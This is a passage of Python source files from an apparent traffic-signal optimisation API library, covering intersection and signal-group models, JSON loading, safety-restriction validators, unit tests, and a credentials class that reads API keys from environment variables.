Dict) -> Intersection:\n \"\"\"\n Loading intersection from json (expected same json structure as generated with to_json)\n :param intersection_dict:\n :return: intersection object\n \"\"\"\n # load signal groups\n signalgroups = [SignalGroup.from_json(signalgroup_dict=signalgroup_dict)\n for signalgroup_dict in intersection_dict[\"signalgroups\"]]\n\n if \"periodic_orders\" in intersection_dict:\n periodic_orders = [PeriodicOrder.from_json(order_dict=order_dict)\n for order_dict in intersection_dict[\"periodic_orders\"]]\n else:\n periodic_orders = []\n\n # load conflicts\n conflicts = [Conflict.from_json(conflict_dict=conflict_dict)\n for conflict_dict in intersection_dict[\"conflicts\"]]\n\n # load other relations (synchronous starts, offsets and greenyellow_lead)\n sync_starts = []\n offsets = []\n greenyellow_leads = []\n greenyellow_trails = []\n for other_relation_dict in intersection_dict[\"other_relations\"]:\n assert other_relation_dict[\"from_start_gy\"] == other_relation_dict[\"to_start_gy\"], \\\n \"besides conflicts, at the moment the cloud api can only handle synchronous starts, offsets, \" \\\n \"greenyellow-leads and greenyellow-trails.\"\n if other_relation_dict[\"from_start_gy\"] is True and other_relation_dict[\"to_start_gy\"] is True:\n if other_relation_dict[\"min_time\"] == other_relation_dict[\"max_time\"]:\n if other_relation_dict[\"min_time\"] == 0: # sync start\n sync_starts.append(SyncStart.from_json(sync_start_dict=other_relation_dict))\n else: # offset\n offsets.append(Offset.from_json(offset_dict=other_relation_dict))\n else: # greenyellow-leads\n greenyellow_leads.append(GreenyellowLead.from_json(json_dict=other_relation_dict))\n elif other_relation_dict[\"from_start_gy\"] is False and other_relation_dict[\"to_start_gy\"] is False:\n greenyellow_trails.append(GreenyellowTrail.from_json(json_dict=other_relation_dict))\n\n return Intersection(signalgroups=signalgroups, conflicts=conflicts, sync_starts=sync_starts,\n offsets=offsets, greenyellow_leads=greenyellow_leads, greenyellow_trails=greenyellow_trails,\n periodic_orders=periodic_orders)\n\n @staticmethod\n def from_swift_mobility_export(json_path) -> Intersection:\n \"\"\"\n Loading intersection from json-file exported from Swift Mobility Desktop\n :param json_path: path to json file\n :return: intersection object\n \"\"\"\n with open(json_path, \"r\") as f:\n json_dict = json.load(f)\n\n # the json structure conforms with the expected structure; it only contains additional information (which is\n # ignored).\n return Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\n\n def _validate(self) -> None:\n \"\"\"\n validate the arguments provided to this object\n :return: - (raises ValueError or TypeError if validation does not pass)\n \"\"\"\n self._validate_types()\n self._validate_ids()\n self._validate_relations_per_pair()\n self._validate_setup_times()\n self._validate_periodic_orders()\n\n def _validate_types(self):\n \"\"\"\n validate the datatypes of the arguments\n \"\"\"\n # signalgroups\n if not isinstance(self.signalgroups, list):\n raise TypeError(\"signalgroups should be a list of SignalGroup objects\")\n for signalgroup in self.signalgroups:\n if not isinstance(signalgroup, SignalGroup):\n raise TypeError(\"signalgroups should be a list of SignalGroup objects\")\n\n # conflicts\n if not isinstance(self.conflicts, list):\n raise TypeError(\"conflicts should be a list of Conflict objects\")\n for conflict in self.conflicts:\n if not isinstance(conflict, Conflict):\n raise 
TypeError(\"conflicts should be a list of Conflict objects\")\n\n # sync starts\n if not isinstance(self.sync_starts, list):\n raise TypeError(\"sync_start should be a list of SyncStart objects\")\n for sync_start in self.sync_starts:\n if not isinstance(sync_start, SyncStart):\n raise TypeError(\"sync_start should be a list of SyncStart objects\")\n\n # offsets\n if not isinstance(self.offsets, list):\n raise TypeError(\"offsets should be a list of Offset objects\")\n for offset in self.offsets:\n if not isinstance(offset, Offset):\n raise TypeError(\"offset should be a list of Coordination objects\")\n\n # greenyellow_leads\n if not isinstance(self.greenyellow_leads, list):\n raise TypeError(\"greenyellow-lead should be a list of GreenyellowLead objects\")\n for greenyellow_lead in self.greenyellow_leads:\n if not isinstance(greenyellow_lead, GreenyellowLead):\n raise TypeError(\"greenyellow-lead should be a list of GreenyellowLead objects\")\n\n # greenyellow_trails\n if not isinstance(self.greenyellow_trails, list):\n raise TypeError(\"greenyellow-trail should be a list of GreenyellowTrail objects\")\n for greenyellow_trail in self.greenyellow_trails:\n if not isinstance(greenyellow_trail, GreenyellowTrail):\n raise TypeError(\"greenyellow-lead should be a list of GreenyellowTrail objects\")\n\n def _validate_ids(self):\n \"\"\"\n validate ids used in signalgroups (uniqueness) and conflicts\n \"\"\"\n # validate unique ids\n ids = [signalgroup.id for signalgroup in self.signalgroups]\n unique_ids = set(ids)\n if len(unique_ids) != len(ids):\n raise ValueError(\"signalgroup ids should be unique\")\n\n # check existence ids used in conflicts\n for conflict in self.conflicts:\n if conflict.id1 not in unique_ids:\n raise ValueError(f\"Unknown signalgoup id '{conflict.id1}' used in conflict\")\n if conflict.id2 not in unique_ids:\n raise ValueError(f\"Unknown signalgoup id '{conflict.id2}' used in conflict\")\n\n for other_relation in self.other_relations:\n if other_relation.from_id not in unique_ids:\n raise ValueError(f\"Unknown signalgoup id '{other_relation.from_id}' \"\n f\"used in object {other_relation.__class__}\")\n if other_relation.to_id not in unique_ids:\n raise ValueError(f\"Unknown signalgoup id '{other_relation.to_id}' \"\n f\"used in object {other_relation.__class__}\")\n\n def _validate_relations_per_pair(self):\n # check uniqueness of the specified conflicts\n num_conflicts = len(self.conflicts)\n num_unique_conflicts = len({frozenset([conflict.id1, conflict.id2]) for conflict in self.conflicts})\n if num_conflicts != num_unique_conflicts:\n raise ValueError(\"Conflicts may not contain duplicate {id1, id2} pairs.\")\n\n # check at most one other-relation specified between each two events.\n other_relation_intervals_encountered = set()\n for other_relation in self.other_relations:\n if isinstance(other_relation, (Offset, SyncStart, GreenyellowLead)):\n from_switch_str = \"green\"\n to_switch_str = \"green\"\n elif isinstance(other_relation, GreenyellowTrail):\n from_switch_str = \"red\"\n to_switch_str = \"red\"\n else:\n raise NotImplementedError(\"Unknown type of other-relations relation\")\n\n other_relation_interval = frozenset([other_relation.from_id, from_switch_str,\n other_relation.to_id, to_switch_str])\n if other_relation_interval in other_relation_intervals_encountered:\n raise ValueError(f\"Multiple other-relations given between the switch to {from_switch_str}\"\n f\"of SG {other_relation.from_id} to the switch to {to_switch_str} \"\n f\"of SG 
{other_relation.to_id}. This is not allowed.\")\n\n def _validate_setup_times(self):\n # validate setup times are not too negative\n id_to_signalgroup = {signalgroup.id: signalgroup for signalgroup in self.signalgroups}\n for conflict in self.conflicts:\n # this we catch in another validation step\n if conflict.id1 not in id_to_signalgroup or conflict.id2 not in id_to_signalgroup:\n continue\n signalgroup1 = id_to_signalgroup[conflict.id1]\n signalgroup2 = id_to_signalgroup[conflict.id2]\n if signalgroup1.min_greenyellow + conflict.setup12 <= 0:\n raise ValueError(f\"setup12 plus min_greenyellow of signal group sg1 must be strictly positive, \"\n f\"which is not satisfied for signal groups sg1='{conflict.id1}' \"\n f\"and sg2='{conflict.id2}'.\")\n if signalgroup2.min_greenyellow + conflict.setup21 <= 0:\n raise ValueError(f\"setup21 plus min_greenyellow of signal group sg2 must be strictly positive, \"\n f\"which is not satisfied for signal groups sg1='{conflict.id1}' \"\n f\"and sg2='{conflict.id2}'.\")\n\n def _validate_periodic_orders(self):\n signalgroup_ids = {signalgroup.id for signalgroup in self.signalgroups}\n conflict_ids = {frozenset([conflict.id1, conflict.id2]) for conflict in self.conflicts}\n for periodic_order in self.periodic_orders:\n if not isinstance(periodic_order, PeriodicOrder):\n raise TypeError(\"periodic_order should be an instance of PeriodicOrder\")\n prev_signalgroup_id = periodic_order.order[-1]\n for signalgroup_id in periodic_order:\n if signalgroup_id not in signalgroup_ids:\n raise ValueError(f\"Order {periodic_order} uses an unknown signalgroup id {signalgroup_id}\")\n if frozenset([prev_signalgroup_id, signalgroup_id]) not in conflict_ids:\n raise ValueError(f\"Each two subsequent signalgroups in a periodic order should be conflicting. \"\n f\"This does not hold for {prev_signalgroup_id} and {signalgroup_id} in \"\n f\"order {periodic_order}\")\n\n prev_signalgroup_id = signalgroup_id\n"
},
{
"alpha_fraction": 0.6569200754165649,
"alphanum_fraction": 0.6569200754165649,
"avg_line_length": 26,
"blob_id": "1e86b88f0531789d5bae495dfc0f573970c416b9",
"content_id": "6606a4f26a526c3f99dee2735ee9445af766aa9a",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 513,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 19,
"path": "/swift_cloud_py/authentication/credentials.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import os\n\n\nclass Credentials:\n \"\"\"\n credentials retrieved from environment variables\n \"\"\"\n def __init__(self):\n # swift mobility cloud credentials from environment variables to prevent hard-coding credentials\n self._access_key = os.environ.get(\"smc_api_key\")\n self._secret_access_key = os.environ.get(\"smc_api_secret\")\n\n @property\n def access_key(self):\n return self._access_key\n\n @property\n def secret_access_key(self):\n return self._secret_access_key\n"
},
{
"alpha_fraction": 0.603080153465271,
"alphanum_fraction": 0.6343483924865723,
"avg_line_length": 48.25862121582031,
"blob_id": "bf7025cb377afe6684f713125bfd3652b95e702d",
"content_id": "06f3f1c6022f3873e98f31fddcc3bce8638a56a9",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8571,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 174,
"path": "/swift_cloud_py/validate_safety_restrictions/test/test_validation_of_fixed_order.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom collections import defaultdict\nfrom itertools import combinations\nfrom typing import List\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.validate_safety_restrictions.validate_fixed_orders import validate_fixed_orders\n\n\nclass TestValidatingCompleteness(unittest.TestCase):\n \"\"\" Unittests of the function find_other_sg_relation_matches \"\"\"\n\n def setUp(self) -> None:\n self._signal_groups = []\n self._fixed_orders = []\n self._greenyellow_intervals = defaultdict(list)\n self._period = None\n\n def test_three_signalgroups_valid(self):\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg2\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg3\", start=22, end=30)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg2\", \"sg3\"])\n self._set_period(period=40)\n self._expect_valid_fixed_order()\n\n def test_three_signalgroups_not_valid(self):\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg2\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg3\", start=22, end=30)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg3\", \"sg2\"])\n self._set_period(period=40)\n self._expect_valid_fixed_order(expect_valid=False)\n\n def test_shift_invariance_valid(self) -> None:\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._set_period(period=40)\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg2\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg3\", start=22, end=30)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg2\", \"sg3\"])\n\n for shift in [shift for shift in range(0, 50, 1)]:\n with self.subTest(f\"shift={shift}\"):\n self._expect_valid_fixed_order(shift=shift)\n\n def test_shift_invariance_not_valid(self) -> None:\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg2\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg3\", start=22, end=30)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg3\", \"sg2\"])\n self._set_period(period=40)\n\n for shift in [shift for shift in range(0, 50, 1)]:\n with self.subTest(f\"shift={shift}\"):\n self._expect_valid_fixed_order(shift=shift, expect_valid=False)\n\n def test_four_signalgroups_valid(self):\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_signalgroup(name=\"sg4\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n 
self._add_greenyellow_interval(name=\"sg2\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg3\", start=22, end=30)\n self._add_greenyellow_interval(name=\"sg4\", start=32, end=40)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg2\", \"sg3\"])\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg3\", \"sg4\"])\n self._set_period(period=50)\n\n for shift in [shift for shift in range(0, 60, 1)]:\n with self.subTest(f\"shift={shift}\"):\n self._expect_valid_fixed_order(shift=shift)\n\n def test_four_signalgroups_invalid(self):\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_signalgroup(name=\"sg4\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg2\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg3\", start=22, end=30)\n self._add_greenyellow_interval(name=\"sg4\", start=32, end=40)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg2\", \"sg3\"])\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg4\", \"sg3\"])\n self._set_period(period=50)\n\n for shift in [shift for shift in range(0, 60, 1)]:\n with self.subTest(f\"shift={shift}\"):\n self._expect_valid_fixed_order(shift=shift, expect_valid=False)\n\n def test_multiple_greenyellow_intervals_valid(self):\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg1\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg2\", start=22, end=30)\n self._add_greenyellow_interval(name=\"sg2\", start=32, end=40)\n self._add_greenyellow_interval(name=\"sg3\", start=42, end=50)\n self._add_greenyellow_interval(name=\"sg3\", start=52, end=60)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg2\", \"sg3\"])\n self._set_period(period=70)\n self._expect_valid_fixed_order()\n\n def test_multiple_greenyellow_intervals_not_valid(self):\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg3\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg2\", start=22, end=30)\n self._add_greenyellow_interval(name=\"sg2\", start=32, end=40)\n self._add_greenyellow_interval(name=\"sg3\", start=42, end=50)\n self._add_greenyellow_interval(name=\"sg1\", start=52, end=60)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg2\", \"sg3\"])\n self._set_period(period=70)\n self._expect_valid_fixed_order(expect_valid=False)\n\n def _add_greenyellow_interval(self, name: str, start: float, end: float) -> None:\n self._greenyellow_intervals[name].append([start, end])\n\n def _add_fixed_periodic_order(self, order: List[str]) -> None:\n self._fixed_orders.append(PeriodicOrder(order=order))\n\n def _set_period(self, period: float) -> None:\n self._period = period\n\n def _add_signalgroup(self, name: str) -> None:\n traffic_light = TrafficLight(capacity=0.5, lost_time=0.0)\n self._signal_groups.append(SignalGroup(id=name, traffic_lights=[traffic_light],\n min_greenyellow=2, max_greenyellow=20, min_red=2,\n max_red=50, min_nr=1, max_nr=3))\n\n def _expect_valid_fixed_order(self, expect_valid: bool = True, shift: float = 0) -> None:\n # assume all signalgroups are conflicting for this test\n conflicts = []\n for signalgroup1, signalgroup2 in combinations(self._signal_groups, 
2):\n if signalgroup1 == signalgroup2:\n continue\n conflicts.append(Conflict(id1=signalgroup1.id, id2=signalgroup2.id, setup12=1, setup21=1))\n intersection = Intersection(signalgroups=self._signal_groups, conflicts=conflicts,\n periodic_orders=self._fixed_orders)\n\n fts_dict = {\"period\": self._period,\n \"greenyellow_intervals\": {name: [[(t + shift) % self._period for t in interval]\n for interval in intervals]\n for name, intervals in self._greenyellow_intervals.items()}}\n\n fts = FixedTimeSchedule.from_json(fts_dict=fts_dict)\n valid = True\n try:\n validate_fixed_orders(intersection=intersection, fts=fts)\n except SafetyViolation:\n valid = False\n\n self.assertEqual(valid, expect_valid)\n"
},
{
"alpha_fraction": 0.7669491767883301,
"alphanum_fraction": 0.7686440944671631,
"avg_line_length": 52.6363639831543,
"blob_id": "9f8267dcf7898d078b987df42436d0f0d934b88b",
"content_id": "a12ce3cf28ce8add0ca3faf22955b4eb63fcb8c5",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1180,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 22,
"path": "/swift_cloud_py/validate_safety_restrictions/validate_completeness.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "\"\"\"\nValidate that all of the signal groups are included\n\"\"\"\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\n\n\ndef validate_completeness(intersection: Intersection, fts: FixedTimeSchedule):\n \"\"\"\n Ensures that greenyellow intervals are specified for all signalgroups\n :param intersection: intersection object containing the signal groups for which the greenyellow intervals should\n be specified\n :param fts: fixed-time schedule to validate\n :raises SafetyViolation if validations fail\n \"\"\"\n for signalgroup in intersection.signalgroups:\n if not fts.includes_signalgroup(signalgroup=signalgroup):\n raise SafetyViolation(f\"No greenyellow intervals specified for {signalgroup.id}\")\n # if the signal group is included in the schedule, then check if the number of greenyellow intervals is >= 1\n if len(fts.get_greenyellow_intervals(signalgroup=signalgroup)) == 0:\n raise SafetyViolation(f\"No greenyellow intervals specified for {signalgroup.id}\")\n"
},
{
"alpha_fraction": 0.6874843835830688,
"alphanum_fraction": 0.6889832615852356,
"avg_line_length": 52.019866943359375,
"blob_id": "3b9eceb96d8c70ef4cb6ac94f862cab6a124a941",
"content_id": "70eb6a7545b19abe87b3f0e4a2d3a1e940b66237",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8006,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 151,
"path": "/swift_cloud_py/validate_safety_restrictions/validate_other_sg_relations.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from typing import Optional, Union, List\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.sg_relations import SyncStart, Offset, GreenyellowLead, GreenyellowTrail\n\nUNKNOWN_TYPE_OTHER_RELATION = \"Unkown type of other_relation\"\n\n\ndef validate_other_sg_relations(intersection: Intersection, fts: FixedTimeSchedule, tolerance: float = 10**(-2)):\n \"\"\"\n Ensure all sync starts, offsets and greenyellow-leads are satisfied.\n :param intersection: intersection containing these inter signal group relations\n :param fts: fixed-time schedule to validate\n :param tolerance: tolerance in seconds for violating safety restrictions\n :raises ValueError if validations fail\n \"\"\"\n for other_relation in intersection.other_relations: # loop over all other-relations\n shift = get_other_sg_relation_shift(other_relation=other_relation, fts=fts, tolerance=tolerance)\n if shift is None:\n raise SafetyViolation(\n f\"{other_relation.__class__} between '{other_relation.from_id}' and {other_relation.to_id}' are \"\n f\"not satisfied.\")\n\n\ndef get_other_sg_relation_shift(other_relation: Union[Offset, GreenyellowLead, SyncStart], fts: FixedTimeSchedule,\n tolerance: float = 10**(-2)) -> Optional[int]:\n \"\"\"\n Find a shift 'shift' of the greenyellow intervals such that the specified inter signal group relation is satisfied\n for each pair {(id_from, index), (id_to, index + shift)} of greenyellow intervals of signal groups id_from and\n id_to, where (id, index) refers to the greenyellow interval with index 'index' of signal group with id 'id'.\n :param other_relation: the inter signal group relation for which we want to find the shift.\n :param fts: fixed-time schedule.\n :param tolerance: tolerance in seconds for violating safety restrictions\n :return: the shift (None if no such shift can be found).\n \"\"\"\n # Get the greenyellow intervals of the associated signal groups\n intervals_from = fts.get_greenyellow_intervals(signalgroup=other_relation.from_id)\n intervals_to = fts.get_greenyellow_intervals(signalgroup=other_relation.to_id)\n\n if len(intervals_from) != len(intervals_to):\n raise SafetyViolation(\n f\"Signal groups {other_relation.__class__} should have the same number of GreenYellowPhases;\"\n f\"this is not satisfied for signalgroups {other_relation.from_id} and {other_relation.to_id}\")\n\n # Matrix of size len(intervals_to) x len(intervals_from)\n matches = [[False] * len(intervals_to)] * len(intervals_from)\n\n # for each greenyellow interval of signal group with id 'other_relation.from_id' we try to find which of the\n # greenyellow intervals of the signal group with id 'other_relation.to_id' satisfy the specified inter signal group\n # relation w.r.t. 
this greenyellow interval\n for index_from, interval_from in enumerate(intervals_from):\n matches[index_from] = find_other_sg_relation_matches(other_relation=other_relation, fts=fts,\n index_from=index_from, tolerance=tolerance)\n\n # does an unambiguous shift (reindexing) of the greenyellow intervals of signal group with id 'other_relation.to_id'\n # exist\n return get_shift_of_one_to_one_match(matches=matches)\n\n\ndef get_shift_of_one_to_one_match(matches: List[List[bool]]) -> Optional[int]:\n \"\"\"\n Matches is an n x n matrix representing a directed bipartite graph.\n Item i is connected to item j if matches[i][j] = True\n We try to find a shift k such that each item i is matched to an item j + shift\n\n usecase:\n for other_relations a shift 'shift' of the greenyellow intervals must exist such that other_relation is satisfied\n for each pair {(id_from, index), (id_to, index + shift)} of greenyellow intervals of signal groups id_from and\n id_to.\n :param matches: n x n matrix\n :return: shift or None if no such shift can be found\n :raises ValueError when matches is not an nxn boolean matrix\n \"\"\"\n value_error_message = \"matches should be an nxn boolean matrix\"\n n = len(matches)\n if not isinstance(matches, list):\n raise ValueError(value_error_message)\n for row in matches:\n if not isinstance(matches, list) or len(row) != n:\n raise ValueError(value_error_message)\n if not all(isinstance(item, bool) for item in row):\n raise ValueError(value_error_message)\n\n for shift in range(n):\n # example:\n # suppose matches equals:\n # [[False, True, False], [False, False, True],[True, False, False]]\n # then a shift of 1 to the left would give\n # np.array([[True, False, False], [False, True, False],[False, False, True]])\n # this has all diagonal elements\n # below we do this check more efficiently for a shift of 'shift' to the left.\n if all(matches[row][(row + shift) % n] for row in range(n)):\n return shift\n return None\n\n\ndef find_other_sg_relation_matches(other_relation: Union[SyncStart, Offset, GreenyellowLead, GreenyellowTrail],\n fts: FixedTimeSchedule, index_from: int, tolerance: float = 10**(-2)) -> List[bool]:\n \"\"\"\n Find the greenyellow intervals of the signal group with id 'other_relation.to_id' that satisfies the specified\n inter signalgroup relation w.r.t. 
the greenyellow interval of signal group other_relation.from_id at index\n 'index_from'\n :param other_relation: the other relation (sync start, offset or greenyellow-lead)\n :param fts: fixed-time schedule\n :param index_from: see above\n :param tolerance: tolerance in seconds for violating safety restrictions\n :return: boolean list indicating the matches.\n \"\"\"\n # Get the greenyellow intervals of the associated signal groups\n interval_from = fts.get_greenyellow_interval(signalgroup=other_relation.from_id, k=index_from)\n intervals_to = fts.get_greenyellow_intervals(signalgroup=other_relation.to_id)\n\n matches = [False] * len(intervals_to)\n\n if isinstance(other_relation, (SyncStart, Offset, GreenyellowLead)):\n time_from = interval_from.start_greenyellow\n elif isinstance(other_relation, GreenyellowTrail):\n time_from = interval_from.end_greenyellow\n else:\n raise ValueError(UNKNOWN_TYPE_OTHER_RELATION)\n for index_to in range(len(intervals_to)):\n if isinstance(other_relation, (SyncStart, Offset, GreenyellowLead)):\n time_to = intervals_to[index_to].start_greenyellow\n elif isinstance(other_relation, GreenyellowTrail):\n time_to = intervals_to[index_to].end_greenyellow\n else:\n raise ValueError(UNKNOWN_TYPE_OTHER_RELATION)\n\n # determine the desired range of the time between time_from and time_to.\n if isinstance(other_relation, SyncStart):\n min_time = 0\n max_time = 0\n elif isinstance(other_relation, Offset):\n min_time = other_relation.seconds\n max_time = other_relation.seconds\n elif isinstance(other_relation, (GreenyellowLead, GreenyellowTrail)):\n min_time = other_relation.min_seconds\n max_time = other_relation.max_seconds\n else:\n raise ValueError(UNKNOWN_TYPE_OTHER_RELATION)\n\n # Determine the actual time between time_from and time_to. We correct for min_time potentially being negative.\n time_between = (time_to - time_from - (min_time - tolerance)) % fts.period + (min_time - tolerance)\n\n # Note that result is time_between in [other_relation.min_time, other_relation.min_time + period]\n if min_time - tolerance < time_between < max_time + tolerance:\n matches[index_to] = True\n\n return matches\n"
},
{
"alpha_fraction": 0.6519173979759216,
"alphanum_fraction": 0.6617502570152283,
"avg_line_length": 39.68000030517578,
"blob_id": "2fa37cd342fe463d01248177d12703b8b3b18e82",
"content_id": "1708a8f5d66ea774836151dfede676b04d3f2fec",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1017,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 25,
"path": "/swift_cloud_py/entities/kpis/kpis.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from typing import Dict\n\n\nclass KPIs:\n def __init__(self, delay: float, capacity: float):\n \"\"\"\n :param delay: estimation of the the delay (in seconds) that road users are expected to experience at the\n intersection.\n :param capacity: the largest increase in traffic that the intersection is expected to be able to handle.\n For example, capacity=1.1 would indicate that the intersection can handle a 10% increase in traffic, while\n capacity=0.9 indicates that the intersection is already oversaturated (and this amount of traffic has to reduce\n by 10% for the intersection to become 'stable' again).\n \"\"\"\n self.delay = delay\n self.capacity = capacity\n\n def to_json(self):\n return {\"delay\": self.delay, \"capacity\": self.capacity}\n\n @classmethod\n def from_json(cls, json_dict: Dict[str, float]):\n return cls(**json_dict)\n\n def __repr__(self):\n return f\"KPIs: delay={self.delay:.2f}s, capacity={self.capacity:.3f}\"\n"
},
{
"alpha_fraction": 0.6134873032569885,
"alphanum_fraction": 0.6215131878852844,
"avg_line_length": 46.520931243896484,
"blob_id": "d273838cf7313a1d576c9036c6ff29f48f114ac8",
"content_id": "bd99685367562725bc44310a953102414640d891",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10217,
"license_type": "permissive",
"max_line_length": 124,
"num_lines": 215,
"path": "/swift_cloud_py/entities/intersection/sg_relations.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using a class as typing inside the same class\nfrom typing import Dict\n\n\nclass Conflict:\n def __init__(self, id1: str, id2: str, setup12: float, setup21: float) -> None:\n \"\"\"\n A conflict between two signal groups; this indicates that the corresponding traffic streams are conflicting and\n may not simultaneously cross the intersection.\n :param id1: id of signal group\n :param id2: id of signal group\n :param setup12: minimum time between the end of a greenyellow interval of signal group id1 and the start of\n a greenyellow interval of signal group id2.\n :param setup21: minimum time between the end of a greenyellow interval of signal group id2 and the start of\n a greenyellow interval of signal group id1.\n \"\"\"\n # by converting to the correct data type we ensure correct types are used\n self.id1 = str(id1)\n self.id2 = str(id2)\n self.setup12 = float(setup12) # defined as time from end gy of sg with id1 to start gy of sg with id2\n self.setup21 = float(setup21)\n\n # validate values of arguments\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return self.__dict__\n\n @staticmethod\n def from_json(conflict_dict: Dict) -> Conflict:\n \"\"\"Loading conflict from json (expected same json structure as generated with to_json)\"\"\"\n return Conflict(id1=conflict_dict[\"id1\"],\n id2=conflict_dict[\"id2\"],\n setup12=conflict_dict[\"setup12\"],\n setup21=conflict_dict[\"setup21\"])\n\n def _validate(self):\n \"\"\" Validate input arguments of Confict \"\"\"\n if not self.id1 != self.id2:\n raise ValueError(\"ids of conflict must be different\")\n if not self.setup12 + self.setup21 >= 0:\n raise ValueError(\"setup12+setup21 must be non-negative\")\n\n\nclass SyncStart:\n def __init__(self, from_id: str, to_id: str) -> None:\n \"\"\"\n Force synchronous start (of each greenyellow interval)\n between two signal groups (the ones with id 'from_id' and 'to_id').\n\n Note: This also forces the number of greenyellow intervals to be the same for both signal groups\n :param from_id: name of signalgroup\n :param to_id: name of signalgroup\n \"\"\"\n # by converting to the correct data type we ensure correct types are used\n self.from_id = str(from_id)\n self.to_id = str(to_id)\n\n # store unambiguously\n if self.from_id < self.to_id:\n self.to_id, self.from_id = self.from_id, self.to_id\n\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return {\"from_id\": self.from_id, \"from_start_gy\": True,\n \"to_id\": self.to_id, \"to_start_gy\": True,\n \"min_time\": 0.0, \"max_time\": 0.0, \"same_start_phase\": True}\n\n @staticmethod\n def from_json(sync_start_dict: Dict) -> SyncStart:\n \"\"\"Loading synchronous start from json (expected same json structure as generated with 